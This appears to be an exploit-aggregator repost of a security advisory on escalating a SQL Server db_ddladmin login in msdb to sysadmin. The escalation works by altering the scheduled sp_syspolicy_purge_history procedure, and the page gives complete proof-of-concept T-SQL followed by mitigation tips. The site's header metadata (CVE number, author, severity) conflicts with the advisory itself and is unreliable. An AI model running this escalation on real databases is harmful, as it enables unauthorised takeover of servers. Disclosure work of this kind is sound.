Advertisement






Microsoft SQL Server db_ddladmin Privilege Escalation

CVE Category Price Severity
CVE-2018-8273 CWE-269 $5,000 High
Author Risk Exploitation Type Date
Abdelhamid Naceri High Remote 2024-01-14
CVSS
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2024010051

Below is a copy:

Microsoft SQL Server db_ddladmin Privilege Escalation
Title: SQL Server Privilege Escalation from db_ddladmin to sysadmin
Product:                   Microsoft SQL Server
Affected Version(s):       2014,2016,2017,2019,2022
Tested Version(s):         2014,2016,2017,2019,2022
Risk Level:                Medium
Author of Advisory:        Emad Al-Mousa

Overview:

Privilege Escalation is a serious security attack that attackers seek to compromise IT infrastructure and systems. attackers will either exploit vulnerabilites or misconfiguration in the system to escalate their permissions and take over the whole system.

*****************************************
Vulnerability Details:

By design when you install SQL Server database engine a job is created called syspolicy_purge_history , and this job by design will run every day. This job can be weaponized for privilege escalation attack.

attacker will require to compromise a database account that is added in MSDB system database and is granted db_ddladmin role.


*****************************************
Proof of Concept (PoC):


I will create a dummy account called toto  (for the sake of simulation it will be SQL Authenticated account):

USE [master]

GO

CREATE LOGIN [toto] WITH PASSWORD=N'toto', DEFAULT_DATABASE=[master], DEFAULT_LANGUAGE=[us_english], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF

GO

And, then I will add the account as database user in system database MSDB with db_ddladmin permission:

USE [msdb]

GO

CREATE USER [toto] FOR LOGIN [toto]

GO

USE [msdb]

GO

ALTER ROLE [db_ddladmin] ADD MEMBER [toto]

GO

Then, I will execute the following modification code against the procedure:

USE [msdb]

GO

ALTER  PROCEDURE [dbo].[sp_syspolicy_purge_history]

AS

BEGIN

ALTER SERVER ROLE [sysadmin] ADD MEMBER [toto]

END


The next scheduled run-time for the job syspolicy_purge_history, the account toto will be escalated to SYSADMIN role, which means he will he/she will take over the whole SQL Server database system.


-***- To protect from such attacks you will need to follow these security tips:

Implement in-place auditing for privilege escalation attacks [smart auditing.dont audit everything as auditing will impose performance overhead]

Implement least privilege concept in your environment, do not grant any account extra permissions that can be weaponized for security breach.

Strong Identity and account management approach should be in-place, passwords policies are important to make brute force attacks challenging.

patch your environments , and follow best security practices.

*****************************************
References:
https://databasesecurityninja.wordpress.com/2024/01/07/sql-server-privilege-escalation-from-db_ddladmin-to-sysadmin/
https://learn.microsoft.com/en-us/sql/relational-databases/security/authentication-access/database-level-roles?view=sql-server-ver16




Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.